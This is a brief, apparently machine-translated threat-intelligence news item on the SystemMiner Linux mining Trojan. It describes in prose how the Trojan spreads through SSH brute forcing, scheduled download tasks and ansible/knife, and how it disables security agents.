Tencent Yujian: Be wary of Linux mining Trojan SystemMiner intruders will block other mining URLs to monopolize mining resources

Tencent Yujian Threat Intelligence Center issued a statement today stating that recently, the Tencent security team successfully handled a mining Trojan incident at an enterprise. A Linux server of the enterprise experienced a slow system card and high CPU usage. Through a security check of the failed server, it was found that the server encountered a SSH weak password blast intrusion. The intruder implants a timed task to achieve persistence. The timed task downloads and executes the virus mother INT. INT has multiple bash commands built in, and it will further download and execute the Linux mining Trojan SystemMiner. In addition, the intruder will use the operation and maintenance tools ansible, knife and other execution commands to infect other machines on the internal network in batches. They will try to download scripts to uninstall security products such as Tencent Yunyun Mirror and Aliyun An Knight to achieve self-protection. The file blocks other mining URLs to exclusively mine resources.